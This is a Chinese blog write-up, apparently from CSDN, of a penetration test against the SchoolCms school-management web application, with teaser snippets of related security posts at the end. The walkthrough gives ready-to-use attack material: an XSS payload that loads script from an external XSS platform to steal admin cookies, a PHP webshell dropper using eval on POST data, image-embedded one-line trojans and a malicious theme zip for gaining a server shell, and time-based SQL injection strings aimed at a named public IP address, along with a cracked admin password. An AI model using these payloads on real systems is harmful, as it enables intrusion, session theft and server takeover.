代码编织梦想

目录

SchoolCms漏洞渗透测试

信息收集

一、弱口令爆破

二、XSS

反射型XSS

存储型XSS

三、文件上传漏洞

站点配置-->站点设置存在文件上传点

主题管理--->主题安装存在文件上传

四、日志泄露

五、SQL注入

SchoolCms漏洞渗透测试

站点首页:

信息收集

 检索ip信息,扫描

 namp扫描端口

 信息收集,爆破目录

 使用御剑扫描

扫描端口

 通过爆破的目录,我们可以发现,目录下有一个压缩包,我们尝试下载

可下载:

 下载后打开,发现是网站的源码

一、弱口令爆破

尝试进入后台:

 进入后台,进行爆破密码
 爆破后台密码

首先尝试登录:尝试admin账号,密码随意

说明账号存在,但密码错误。

 接下来进行爆破密码
 抓包,将数据信息发给Intruder

使用狙击手模式。确定了用户,爆破密码。

选择密码字典

 等待过后,观察发现,发现不同的长度,尝试是否为密码

 密码正确,成功登录后台
 密码为lovelove

二、XSS

反射型XSS

 在后台的学生管理,成绩管理,教师管理,文章管理等多处,存在xss跨站脚本攻击
 以文章管理为例,此处为反射型XSS

 在文章管理处,发现一处存在xss
 获取cookie信息

 
在交换框当中输入攻击语句
 </tExtArEa>'"><sCRiPt sRC=//xss.yt/nFtJ></sCrIpT>
 ​
 在xss平台查看动态

 复制对应的url和cookie信息,看是否能够实现跳转
 回到网站的首页

 执行成功后,成功跳转到网站的后台

存储型XSS

 xss存储型

 前端界面,出现弹窗

 每个对应的栏都会出现弹窗,存在存储型XSS

三、文件上传漏洞

站点配置-->站点设置存在文件上传点

 方式一:
 上传文件,验证是否能被解析,写入一个木马,直接进行连接
 ​
 方式二:
 创建木马文件,写入木马,进行连接

 验证是否存在文件上传漏洞,获取服务器的shell

 接下来我们进行抓包,将php语句插入到图片的后面,看服务器是否能解析

 将php语句插入到图片当中,然后放包即可

 接下来到文件上传点,鼠标右键点击检查,查看代码,找到文件的上传点,访问试试

 接下来我们进行访问此上传文件的链接
 不难发现我们上传的文件变成了.php文件

 访问链接后,发现此文件当中的php语句已经被解析

 同理,我们可以将php测试语句换成php一句话木马,直接使用蚁剑进行连接

 抓包获取数据,将php一句话木马写进图片码当中

 追加一句话木马

 同理,去找到文件上传的对应链接,然后去访问

 打开hackbar,执行php语句,看是否能被解析

 通过蚁剑去连接

 成功拿到服务器shell

方式二,在文件上传的目录下,去创建一个木马文件,并写入木马,相同的原理,之不过就是在图片码的后面,加上一句php创建并写入文件的语句
 ​
 <?php fwrite(fopen("shell.php","w"),'<?php @eval($_POST["lc"]);?>');?>
 ​
 方法同以上一致,依旧抓包获取数据,将以上的语句插入到图片码当中去

 放包以后,再去访问

 我们猜测php语句已经被执行,接下来进行查看

访问上传路径下的文件,查看文件是否创建成功。

 尝试切换到我们创建的文件当中去,来访问,输入php语句是否能被解析

 成功被解析,通过哥斯拉连接,连接成功

 成功拿到服务器shell

可查看服务器目录下的所有内容,可进行增加、修改和删除等等一系列操作!

主题管理--->主题安装存在文件上传

 尝试上传压缩包

经过分析,将一张图片和一个php木马文件整合成一个文件夹,命名为shell_Html,然后打包压缩。

接下来进行上传:

 抓包获取数据包信息,修改数据包,修改类型为zip,然后放包

 验证是否上传成功,查看上传点

根据分析源码,该压缩包上传会被解压,解压后,文件夹会被拆开,然后拼接成文件,拼接的文件为文件夹(XX_Html)名中的XX+文件原来的名称。这里是shell_Html。所以文件名被修改为shellcmd.php和shellshell.png

 通过观察可知道,主题上传的路径为
 Application\Home\View\
 ​
 尝试访问新上传的文件夹当中的文件
 Application\Home\View\shellcmd.php
 看是否能被解析

 php语句被成功解析
 使用第三方工具,蚁剑或者哥斯拉进行连接,获取shell

成功获取服务器shell

 成功获取服务器的shell,连接成功

回到服务器当中去查看验证:

成功上传,并成功获取了权限。

四、日志泄露

 
通过尝试验证,发现日志泄露
 url地址:
 http://43.143.169.215/Application/Runtime/Logs/Home/23_05_23.log ---跟日期 年份_月份_日期.log
 ​
 访问过后,成功回显。并下载

 查看下载后的日志内容

五、SQL注入

通过尝试,结果观察,发现后台存在sql注入点
 ​
 注入点:
 index.php?m=Admin&c=Article&a=SaveInfo
 ​
 注入语句:
 index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+
 ​
 访问:
 http://43.143.169.215/index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+

延迟后显示:

抓包看其变化:

正常下:

注入后:

成功延时

第二处注入点:

http://ip/schoolcms/index.php?m=Admin&c=Article&a=Index
 此次存在sql注入,执行删除操作时进行抓包查看其变化
 ​
 注入点:
 http://ip/schoolcms/index.php?m=Admin&c=Article&a=Delete的数据包当中,
 在数据包修改原始数据
 添加id[where]=id=1+or+sleep(5)

执行删除的操作,观察url信息变化,抓包抓取数据信息,修改数据包,尝试sql注入。

正常情况下:

注入后:

sleep()中的延迟时间随意。

修改完后,放包观察其变化

成功延时

解码后:

文章不妥之处,欢迎批评指正! 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/131025969

某校园内网渗透测试-爱代码爱编程

信息收集   一、基础信息 目标系统是windows, 服务层有IIs6.0,Apache-Web-Server, 支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6   二、端口开放情况: 利用goby对ip进行扫描,使用nmap工具也同样能扫出所有开放的端口   三、资产探测: 结合goby和nmap扫描

基于高校网络技术渗透-爱代码爱编程

渗透测试实验 项目场景: 某高校校园网络渗透项目 nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.92.1/24不扫描端口,来判定主机是否存活。 nmap -A -p- -T4 192.168.92.133 探测靶场突破口 开放了7744端口号,服务为ssh,80端口,服务为ht

XXX高校信息安全服务解决方案-爱代码爱编程

XXX高校网络安全服务解决方案 目录 XXX高校网络安全服务解决方案 1.综述 1.1.项目背景 1.2.项目目标 1.3.项目范围 1.4.安全需求分析 2.安全服务概述 2.1.安全服务的必要性 2.2.安全服务原则 2.3.安全服务方针 3. 技术支持方案 3.1安全服务一览表 3.

没有基础怎么自学渗透测试工程师?_渗透自学学谁好-爱代码爱编程

去百度以及其他地方搜索渗透测试工程师大部分都是在宣传CISP-PTE认证培训的课程的,包括知乎上的回答也被机构宣传课程的广告包围了。提前声明,本人是个人兴趣爱好以及中年危机被迫的在自学渗透测试。同时我也会讲清楚学习培训和认证培训的区别。 我在学习中以及跟学员、行业大佬的沟通中逐步对这个行业的起步有了大概的了解,现在根据我目前了解的情况给大家一个入行的

如何成为一名专业的云渗透测试工程师_阿里云盘 渗透测试工程师-爱代码爱编程

前言 很多人不知道网络安全发展前景好吗?学习网络安全能做什么?现在行业有哪些热门岗位?今天为大家解答下。 从宏观层面来看,新基建成为中国经济热词,政府和企业业务上云全面提速,随着云计算技术的快速发展,云安全问题已成为重点关注的领域。但从安全角度来看,这也意味着安全态势变得更加复杂,安全的范畴也变得更加广泛,漏洞存在于每个地方、攻击可以由世界任